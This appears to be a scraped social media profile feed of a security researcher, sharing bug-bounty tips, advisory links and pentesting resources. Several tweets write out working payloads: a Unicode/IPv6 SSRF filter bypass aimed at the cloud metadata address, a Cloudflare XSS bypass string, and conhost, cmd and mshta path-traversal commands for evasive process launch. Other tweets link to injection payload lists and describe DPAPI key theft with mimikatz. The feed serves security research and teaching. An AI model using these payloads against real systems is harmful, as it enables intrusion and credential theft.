Similar User
@MCKSysAr
@maaanuu95
@Dolphin01684386
@intthree
@ArtsSEC
@gabdotsh
@reib3n1
@Alex91dotar
@pastaCLS
@juli4n_munoz
@daletoniris
@airrera
@mattsec
@__Danners__
@y3rb1t4
Successfully bypassed a SSRF WAF by using a combination of IPV6 + Unicode. Payload for Metadata instances: http://[::ⓕⓕⓕⓕ:①⑥⑨。②⑤④。⑯⑨。②⑤④]:80 Check images for response difference between 169.254.169.254 and the above payload I shared 🔥 #bugbounty #infosec #waf
I found a SQL on one URL but properly secured. But found @LiveOverflow new video "HTML Sanitizer Bypass Investigation". I give it a try and I was able to bypass Cloudflare which leads to XSS. payload: '<00 foo="<a%20href="javascript:alert('XSS-Bypass')">XSS-CLick</00>--%20/
Doing #BugBounty again :) Quick write-up about a Critical vuln I found: Exploiting Application-Level Profile Semantics (APLS) from Spring 🧙♂️ curl -H 'Accept:application/schema+json' -v http://localhost:8080/alps/profile/users niemand.com.ar/2021/01/08/exp… #BugBountyTips #infosec
New article about how to persist “laterally” reading DPAPI keys. This could be used in a red team project. /cc @CoreSecurity
We know how the Internet feels about #cats: More is better. We're doing our part by showing you how to read #DPAPI keys using #mimikatz: coresecurity.com/core-labs/arti…
Gracias comunidad de Tandil! Un saludo muy grande y un placer haber podido participar.
🔥 ¡Publicamos un nuevo video en nuestro canal de YouTube! 🍻 Diego y @riflon de @CoreSecurity nos estuvieron compartiendo la metodología que usan a la hora de hacer Pentesting y algunas historias de casos reales. ¡Muchas Gracias! 📺 youtu.be/A3Ut_ehMZfA
New Advisory of the SCS Team at #coresecurity coresecurity.com/core-labs/advi… An authenticated OS Command Execution abusing websockets @aritombino
Multiple vulnerabilities in Pandora FMS - New advisory published --> coresecurity.com/core-labs/advi… #CoreSecurity @CoreSecurity
Found an even cooler example with this technique when looking at it quick. When executing with conhost it executes the process without a parent PID. conhost calc.exe/../../windows/notepad.exe Thanks for the inspiring post @julianpentest
This also works really well: cmd.exe /c "gpupdate /force/../../../../../../../../../../windows/notepad.exe" and cmd /c "mshta.exe c:\temp\none.hta/../../../../../../../../../../windows/notepad.exe" Fun stuff to be had with this technique
New XSS stored in Zulip by @aritombino - Advisory here --> coresecurity.com/advisories/zul… #CoreSecurity
I just published Exploiting WebSocket [Application Wide XSS / CSRF] link.medium.com/puqyeTGD93 #bugbountytips #security @Bugcrowd
Payloads collection:- Command Injection:- github.com/payloadbox/com… XSS Payloads:- github.com/payloadbox/xss… XXE Payload List:- github.com/payloadbox/xxe… SQLI Payload List:- github.com/payloadbox/sql… RFI/LFI :- github.com/payloadbox/rfi… Open Redirect:- github.com/payloadbox/ope…
How to build a TCP proxy (Part 1) : Intro : robertheaton.com/2018/08/31/how… Fake DNS Server (Part 2) : robertheaton.com/2018/08/31/how… Proxy Server (Part 3) : robertheaton.com/2018/08/31/how… Fake Certificate Authority (Part 4) : robertheaton.com/2018/08/31/how… cc @RobJHeaton
LM, NTLM, Net-NTLMv2, oh my! A Pentester's Guide to #Windows Hashes medium.com/@petergombos/l…
HTTP Request Smuggling in Apache Traffic Server : regilero.github.io/english/securi… HTTP Smuggling, Jetty : regilero.github.io/english/securi… cc @regilero
![Communauté Francophone Kali linux - Tutoriels de hacking et Pentest. [White hacking only]](https://pbs.twimg.com/profile_images/1148009148090593280/Wu3gZ0Dr.png)
United States Trends
- 1. Hunter 2,06 Mn posts
- 2. Take Ctrl 1.223 posts
- 3. Cyber Monday 67,7 B posts
- 4. $CUTO 12 B posts
- 5. #IDontWantToOverreactBUT 1.535 posts
- 6. Enron 10,3 B posts
- 7. #GivingTuesday 4.886 posts
- 8. #GalaxyFold6 N/A
- 9. #MondayMotivation 19,1 B posts
- 10. Tony White 1.471 posts
- 11. DeFi 208 B posts
- 12. RTFKT 4.477 posts
- 13. Yeontan 894 B posts
- 14. Burisma 76,4 B posts
- 15. #Duolingo365 14,5 B posts
- 16. tannie 263 B posts
- 17. Miller Moss N/A
- 18. Knighton N/A
- 19. Intel 30,4 B posts
- 20. $SMCI 4.565 posts
Who to follow
-
MCKSys Argentina
@MCKSysAr -
Manuel Iglesias 𓆰𓆪
@maaanuu95 -
Dolphin
@Dolphin01684386 -
Albert
@intthree -
ArtsSEC
@ArtsSEC -
Gab
@gabdotsh -
reib3n
@reib3n1 -
Alex 🏳️🌈
@Alex91dotar -
Javier Aguinaga
@pastaCLS -
Jmz
@juli4n_munoz -
Daniel Dieser
@daletoniris -
Aníbal Irrera
@airrera -
Matias Vazquez
@mattsec -
Danners
@__Danners__ -
yerba
@y3rb1t4
Something went wrong.
Something went wrong.